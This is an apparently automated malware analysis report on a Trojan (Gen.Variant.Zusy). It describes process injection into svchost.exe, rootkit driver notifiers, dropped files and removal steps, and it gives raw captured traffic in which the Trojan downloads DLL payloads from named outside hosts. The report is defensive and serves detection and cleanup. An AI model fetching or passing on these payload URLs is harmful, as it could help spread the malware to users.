Gen.Variant.Zusy.189562_28a66abbba

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3652

The Trojan injects its code into the following process(es):

svchost.exe:3884

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:3652 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Windows\WuVaOIS.dll (12 bytes)
C:\ProgramData\gFThJOXu\svchost.exe (9754 bytes)

The Trojan deletes the following file(s):

C:\Windows\WuVaOIS.dll (0 bytes)

Registry activity

Dropped PE files

MD5	File path
3b24050ce849ea9f15363027d11ada2b	c:\ProgramData\gFThJOXu\svchost.exe
3b24050ce849ea9f15363027d11ada2b	c:\Users\All Users\gFThJOXu\svchost.exe
158b710a2ce07e3a34e46118f2ad39f2	c:\Windows\DFaqsb\GBhKYDvG.dll
941f0ec0a5255964542529dde706f296	c:\Windows\DFaqsb\ifqSYmg.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys" the Trojan controls creation and closing of processes by installing the process notifier.

Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):

   %original file name%.exe:3652
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:

   C:\Windows\WuVaOIS.dll (12 bytes)
   C:\ProgramData\gFThJOXu\svchost.exe (9754 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	1236992	989184	5.54503	add7259d069c2588cedcb196d25d6fbe
.rsrc	1241088	12288	9728	4.42852	6676c143b55ed5405b8bceb81ae28187

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://www.58sky.com/index/getcfg?id=20297	119.97.143.41
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://www.58sky.com/index/getcfg?id=3	119.97.143.41
hxxp://5636.ecoma.ourwebpic.com/
hxxp://so.qh-lb.com/
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://175.haodns123.cc/
hxxp://175.haodns123.cc/css/style.css
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js
hxxp://175.haodns123.cc/js/jscript_jquery.faded.js
hxxp://175.haodns123.cc/images/top-ban.jpg
hxxp://175.haodns123.cc/ad.js
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js	14.29.32.98
hxxp://www.ip138.com/	87.245.198.83
hxxp://www.175sf.com/	14.29.32.98
hxxp://www.175sf.com/js/jscript_jquery.faded.js	14.29.32.98
hxxp://www.go890.com/d2/CDClient.dll	87.245.198.83
hxxp://1212.ip138.com/ic.asp	42.236.125.44
hxxp://www.175sf.com/images/top-ban.jpg	14.29.32.98
hxxp://www.175sf.com/css/style.css	14.29.32.98
hxxp://www.go890.com/d2/x86.dll	87.245.198.83
www.haosou.com	180.153.234.170

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /d2/CDClient.dll HTTP/1.1

Host: VVV.go890.com

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Date: Mon, 31 Oct 2016 19:47:33 GMT

Server: kangle/2.9.6

Last-Modified: Mon, 31 Oct 2016 07:09:49 GMT

Content-Type: application/octet-stream

Content-Length: 863232

Age: 1

X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)

Connection: keep-alive

DUP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................(...........S.......@....@.........................................................................<O..P....@..m....................p......................................................................................CODE.....0..............PEC2^O...... ....rsrc....0...@...".................. ....reloc.......p.......*..............@.......................................................................................................................................................................................................................................................................................................................................................................................................................b.. .........c....X.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...|x.o-.l{..L.&..T.]..%?.....3#.T.z.J?....u......_...Hva@l.7d.@..U.....G."a..z..i..L..L..',....../..|D...........1z..o>.hg5m._.........7....},|.o......z.Rwa...l..a.....~"\\Z}.......1..L3....!..6.KW...]h....l7

<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 31 Oct 2016 22:06:21 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Content-Location: hXXp://VVV.175sf.com/index.html

Last-Modified: Mon, 31 Oct 2016 11:05:03 GMT

Content-Encoding: gzip

3d35.............}.s.Y.............!.....D..{...vj..gwbc....$.2...3.if.?.......aC.v.$..... . ...#.....].r.Q.Ue.*..yH..-......nW..2./...s.9..sO../...O..._.4.a........?.uu......==........>...x._.......f.A.......w..4f...==....Q..`......1....W^v.k.......?...r.c.:.....!.r9s9.c.B.........[}..=..........?..Qw....S]f......9O.Q.Mj...>...v.z.>f.Y.>...73........o....]z...1...Ff'..Jv.......=.3;.OH..~.....=......a......G.F....^...k~.K.Ii..@..x.1.9.a...g..R:.y..2....].....?....E..........k;1...x"q..[.JW'.X.I.n,...\.<i}.f.B..t..Sw.W...Z..-..5|.........U..i.C<.Q....Gi2....:5.~..3.r.........*.o......~..'.~.).dT.w.4...{...9..8.M.{.B..V.....|.A.y....'{.{4..._.R...t..~..?=.o. .s....?......c]..|...L3.....?......=.z./...q..O....gC...F.=.S..&z...#...a..<.[_.1...9.E?.......o.G.....u.V...aZ..Q#..c.=M\....{?.}....h.......~E..M1.*........[....2.'....2...=J..l.V......R...........!.%...XN....W&......N........>k1.N.G.?.. .*..>....#.=....V.2..u...| .q.b3s.G....Tku...Q./...;.#....._.=v.9.....w...O...K....].........o.9.Q.F....T...(..ib*....g.t..Pe.......0J.T;<P..vX1.6...u.)..12..W..............M.8............_..5...5...u..S..w2Pt......x..N.......L.v?..n%V..,o .s.. 8..mEun.....EX....m...B.....0..J..........).s......Yz...@..(..>s..#.......B.......\.z..._..&...V.....&...:...T..V.j#.YE....,..9...*.JQ. ...........p:..|06...|lV....Q...9.E.....G..j.....R...F.J.~.....JUy_.....f..;...}.... .)G.t..........<.c..$....M.wR..../..x.............o8....7. ...,.y.7.S.... 2;.s....o.._..V.q.....]h.*D..h;I..K..s....L(k8A...[...=

<<< skipped >>>

GET /d2/x86.dll HTTP/1.1

Host: VVV.go890.com

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Date: Mon, 31 Oct 2016 19:47:36 GMT

Server: kangle/2.9.6

Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT

Content-Type: application/octet-stream

Content-Length: 132608

Age: 1

X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y...y..\yRich..\y........................PE..L...]..W...........!......................................................................@.................................................................|...........................................H...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!...........c.........B..&.......U..j.h..!P..Y.d...P...SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<......<...q........L....o.d....E.......M........Y_^[..]........p.....Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B..r!C.3...0}..@..}.....8.9........&..t..C<.D.x...3<...;.u.|.H.^...e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M

<<< skipped >>>

GET / HTTP/1.1

Host: VVV.ip138.com

Accept: text/html, */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

HTTP/1.1 200 OK

Date: Mon, 31 Oct 2016 03:42:55 GMT

Content-Length: 18658

Content-Type: text/html

Content-Location: hXXp://VVV.ip138.com/index.htm

Last-Modified: Thu, 27 Oct 2016 03:33:45 GMT

Accept-Ranges: bytes

ETag: "4a8df4eb230d21:446a"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 66207

X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)

Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta name="mobile-agent"content="format=html5; url=hXXp://m.ip138.com/">..<title>IP........--.................. | ............ | ............ | ........................</title>..<meta name="Keywords" content="ip,IP....,IP........,ip138">..<meta name="Description" content="ip,IP....,IP........,ip138">..<script language="javascript">..<!--..if(window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/';..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("http://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c

<<< skipped >>>

GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.175sf.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 31 Oct 2016 22:06:22 GMT

Content-Type: application/x-javascript

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT

Content-Encoding: gzip

607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...>..._,..L.,.{....$r...2"...................o.-....E.\7...".........i.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1..........<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(......,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN..."<....OOq...U..XY.v.."..f.K..k...........B}.<?............`......`.9..Ho.....W.5&.w..A S~..........O..M....V....Z.....@.vQ.\..].\..#.,.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ......4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.mv...f5v...p.`....i..T......~..`0k..t...........5......S...`................t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h....q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U........@d.B...f\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3.4R. .c.&..]...o....T..... ..".8....p :.=.Z..b...@......O.f..:==Y...M....Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......

<<< skipped >>>

GET /js/jscript_jquery.faded.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.175sf.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 31 Oct 2016 22:06:22 GMT

Content-Type: application/x-javascript

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Last-Modified: Tue, 19 Jul 2011 02:14:20 GMT

Content-Encoding: gzip

73d.............X.n.6..V....y.];.......[Vt.z......%.f K*E%M.?...H{..<H"e.I..b..K...?.........{.a...K.,|...1..g..5*.j.3..%..,C.k...-..kFE..@oo.,...Lo.f'.....=Q4..</...l%"..=..~..!2.5...U4E)...%...&..2....".............4'h..g.<G..x.5L.6..Z.T.u.j..|%..v...I.(..J..J.J...r[...).Mj`.._.y].|]S<X".._..%x.n.....YWY,y...Y.F.:..g.@B..qX....P?....K*P.....DK4jN..H.i....*......s^0Y..L....xK.r.0l8....!.e.).J.....,.5..k$.@DA...F.6d.oy.....er{._.|.}.\..c.&TR...c..T..Dd<FQ....\B`.b....%....6.&@7..B.K..U....~. .g%.lg.. %..{..d.R3.y.i..2.`.K6...k.Oc....j......C.....w.h.,....qYL.tE...m.P.p^.D9.........!J..f.V<..O...oal...W.3}.......A....:"T..^....s.R.UM..,...K......./W.......4 .%P3....B..A.;T.v...-.i.j.'.eV{...."..8..3h...e.$.>.Y...-..1....4rI..z.b..G..R.y...P..)*.!6.a... khQ@.........6....QS.;.......S O.p..A..]~.q...k..cgg.>B).I..5...)hU2/......MqB ..).v.h.7|...|jJ...V.(U5Y..........&...Q..V5....O..G.z.....C.....eIn....o..K..ax.....>.pk..U...dx.l.l.*..B..R.4._. .>{K./.F.. lp...H0%T..ej...h....1....p.i3.......]..qm4.x.9.gAa..J_.g O.~.......U......O\..>;=..3....;......a..OGr..M..)....c..&.m.[/....at.'.....|zBA 8...X....n..~....3D...p.U.Q..$9WF!..K.. ........Lw.^....XTJAT.`.....gzz....-.....&F{.B.I.V........D.$..e...3...%s.1..%...F.(.0..Hut......P..K.c.%.x..w.K.....=dD..)Q..x0.L.L...V0*.....?v...I.1...E\...q'..........5.v.../2e........t ...C..X.10.o%h..Sl..v... W|..~...P{He...8.E.'W...j8o.{N'.;s..x....]..w......=.x.....s..a/.|.a..K..l.Gw...Q.)....-.n....n....z|t...ni.z.S......}........lZk.pq.......r..

<<< skipped >>>

GET /images/top-ban.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.175sf.com/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.175sf.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Mon, 31 Oct 2016 22:06:23 GMT

Content-Type: image/jpeg

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Last-Modified: Tue, 14 Jun 2016 07:38:00 GMT

Content-Encoding: gzip

6218..............UT.Z.$..C. ..{c....qMpw...........4......w............>.>..:...{..io.K.@^.....?x.....0................N......:..M@...............4...._...........b........a. ......... dT$.4x.D .....CBF@D...................?d..w....K(qpA..T`qj<u.N.n.|^S3M-m..s.B4...".....G...6..............?.`#.(q.....M.p].9@(.E...&(......S.M|WI......n....:...b.c.'n......m........6.....{..R.O..cX.;..B. ......`#jf....."M..Jh..JJ9..$w...[..........5..w.$.I.x.SH.WF!.i....(W...[........L..].$...A......\./.\...y].......4....9..FA'r....|.Q.(@D!......ri%.`.i/...O.J.[hY_..D.!..e.Ao...?#.z......&a.F.)..d.....y.\.b#..w... k...f.......z*....O.w9Y#....Z.....h.....E....Aw.....G..J.....t.B..2..a..*....iP....yb.T....T.".....B>q:WF.9B.....vV..j.....7..1..N:1I.T.....S.... |. .|t._.j....F.>..t.........'S..Mg^.H\.C)X8.P..*/....f*m..\W`..AY.....!......*.<0L.Pi...Pg.}Q....DU....E.(.H..K..!....O.....y...%..@Mk.W.j..3..?..U'.<.V....:._..2.'........;P.gyiy......j....v..E".U.....S.....h.$}:./.E`,.u.a}SN.u.<.._.Ma....P....G"...}.). .2......R...]m.3.....;.G..w@.4..?......<.<.!.6dY.d.G................-t.Zt.`t..w-.c....R.m.;#../..k-....8....t..@,.Hf....B....a........$j.j.PH.............&4H.. Hu...0....J.../..{E....a.. .fo...1w..Y`..J$..1/.#.Z.,..l.......S.....Di....#..o%..Fs..C.8._.z.?...~.G.@.9.J.....w....j4)....Q..v}..T..J.#5..#`.... ......PK....r..........G..9.YWJ) ?..,....tPZ..@.....<...s..k%.iO.....j..... .a....!...m.K.=.XfI{ .\.k.`R...)w....3........._..j...U....]..........x....B...q@R....GS...8.."rR...D*.BlD#..'h.e\

<<< skipped >>>

GET /ic.asp HTTP/1.1

Host: 1212.ip138.com

Accept: text/html, */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

HTTP/1.1 200 OK

Server: Microsoft-IIS/6.0

Connection: keep-alive

Date: Mon, 31 Oct 2016 22:06:23 GMT

Content-Type: text/html

Content-Length: 219

X-Powered-By: ASP.NET

Set-Cookie: ASPSESSIONIDQQCADBBT=LDKBNLNDPEHJBOIGFEEMOIKD; path=/

X-Daa-Tunnel: hop_count=1

<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>..

GET /index/getcfg?id=20297 HTTP/1.1

Host: VVV.58sky.com

Accept: text/html, */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Mon, 31 Oct 2016 22:06:11 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.27

Set-Cookie: PHPSESSID=8mnufegj6miu4d5l91jggmuur5; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Encoding: gzip

ed0..............ms.8..<...S..0..L...u{..Mb.M{.....6 ..m|......"...];...ew..Z..I...vb.Lwp..$$...........!c......t..uCD....$.?}..3.g....>..C.<...$.t.H...).b.t.....!>i....._0`!E.../\#0...`.....m...>@0./1.........n4.T....x."..(8.;...[.Otx..=...zc...."....O........l..-c..o.n..1n..!.i.....8.>..G........F..3| 0..&......^..5{...... ...k.'V.@...v......@.x...f....P....Ju....P...'_.t..sc.e....3J......=...M.....f.b......b..T..W.a...x.....[0j9.*.IF..GQHj.AA...ME./......{.....))..U.Lw..@.8.q.........._\.. ..n...(:(A...kK..l..`..H..5....0..i.km.L..../......X,9.Q..B..M........v.......%..2.*%..h.Q......JPJ....6.|..,A..$..wr!.(....H...y1..%!..c..F..q.=...0t.j..)...1~.2.S]...~.......5|......C...@R%nc`.@..H.rB..........2I.=.......Th...)...C...R.v.q..Q.[9..#..#.5......a.S..Mt.....E.ad*..B)0.,Q...../<..)..K..=...<

&

&

&

&

&c

&c